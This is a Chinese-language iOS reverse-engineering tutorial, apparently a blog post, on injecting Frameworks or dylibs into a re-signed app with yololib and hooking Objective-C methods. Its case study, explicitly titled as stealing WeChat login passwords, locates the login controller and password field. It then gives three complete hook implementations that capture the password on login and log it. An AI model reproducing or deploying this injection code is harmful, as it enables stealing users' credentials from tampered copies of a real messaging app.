iOS逆向-代码注入 iOS逆向-代码注入

代码注入一般修改原始的程序，是利用代码注入的方式，注入代码就会选择利用FrameWork或者Dylib等三方库的方式注入。
Framework注入一.通过Xcode新建Framwork，将库安装进入APP包
二.通过yololib注入Framwork库路径。命令：$yololib（空格）MachO文件路径（空格）库路径

文章图片
BA265A10860294D60FC282E3FCC2F347.png
也可通过脚本注入:

yololib "$TARGET_APP_PATH/$APP_BINARY" "Frameworks/JensenHook.framework/JensenHook"

【iOS逆向-代码注入】三.注入成功的库路径会写入到MachO文件的LC_LOAD_DYLIB字段中
dylib注入一.通过Xcode新建Dylib库（注意：Dylib属于MacOS所以需要修改属性,baseSDK以及codeSign）
二.添加Target依赖，让Xcode将自定义Dylib文件打包进入APP包。
三.利用yololib进行注入。
多种HOOK方式 class_addMethod方式：利用AddMethod方式，让原始方法可以被调用，不至于因为找不到SEL而崩溃
class_replaceMethod方式：利用class_replaceMethod，直接给原始的方法替换IMP
method_setImplementation方式：利用method_setImplementation，直接重新赋值原始的新的IMP
案例分析-窃取微信登录的密码准备工作一. 重签名可运行的程序
对重签名不了解的同学可以查看:(https://www.jianshu.com/p/0fa6352c3ca1)
二.classdump工具，并导出Wechat.app的所有头文件。

文章图片
8.png
导出后文件大致如下:

文章图片
7.png
使用view debug对微信的登录界面进行动态分析。

文章图片
1.png
要窃取微信的密码,就需要在点击登录按钮的时候，获取到控件中的密码, 就完成了。

文章图片
9.png
view debug下点击登录按钮,找到登录按钮的Target是WCAccountMainLoginViewController,Action是onNext，在lldb下,尝试调用WCAccountMainLoginViewController的onNext实例方法，可以调用成功。

文章图片
10.png
在WCAccountMainLoginViewController的头文件中,也能找到onNext方法，这样，点击按钮的方法就找到了，接下来，我们需要找到密码框控件。

文章图片
2.png
通过在view debug找到了有密码的控件是WCUITextField,在lldb下查找控件的nextResponder, 一直往上查找找到了WCAccountMainLoginViewController。

文章图片
3.png
在WCAccountMainLoginViewController的头文件下查找到了_textFieldUserPwdItem, 顺着控件的类型WCAccountTextFieldItem往下找,

文章图片
4.png
没有找到WCUITextField密码控件,于是查找它的父类WCBaseTextFieldItem

文章图片
5.png
在WCBaseTextFieldItem中找到了WCUITextField，在lldb下尝试一下能否找到：

文章图片
6.png 写逻辑代码注入实现,(这里按照多种hook的方式,提供了三种代码) 第一种方式:

#import "InjectCode.h" #import @implementation InjectCode+(void)load { NSLog(@"Framework注入成功"); Method * method = class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext)); BOOL didAdd = class_addMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(jensenLogin), (IMP)myLogin, "v@:"); method_exchangeImplementations(method, class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(jensenLogin))); }void myLogin(id self,SEL sel) { NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)]; NSLog(@"获取到密码:%@",pwd); [self performSelector:@selector(jensenLogin)]; }@end

第二种方式:

#import "InjectCode.h" #import @implementation InjectCodeIMP (* oldLogin)(id self,SEL cmd); +(void)load { NSLog(@"Framework注入成功"); oldLogin = class_getMethodImplementation(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext)); class_replaceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext), myLogin, "v@:"); }void myLogin(id self,SEL sel) { NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)]; NSLog(@"获取到密码:%@",pwd); oldLogin(self,sel); }@end

第三种方式:

#import "InjectCode.h" #import @implementation InjectCodeIMP (* oldLogin)(id self,SEL cmd); +(void)load { NSLog(@"Framework注入成功"); Method * onNext = class_getInstanceMethod(NSClassFromString(@"WCAccountMainLoginViewController"), @selector(onNext)); oldLogin = method_getImplementation(onNext); method_setImplementation(onNext, (IMP)myLogin); }void myLogin(id self,SEL sel) { NSString * pwd = [[[self valueForKey:@"_textFieldUserPwdItem"] valueForKey:@"m_textField"] performSelector:@selector(text)]; NSLog(@"获取到密码:%@",pwd); oldLogin(self,sel); }@end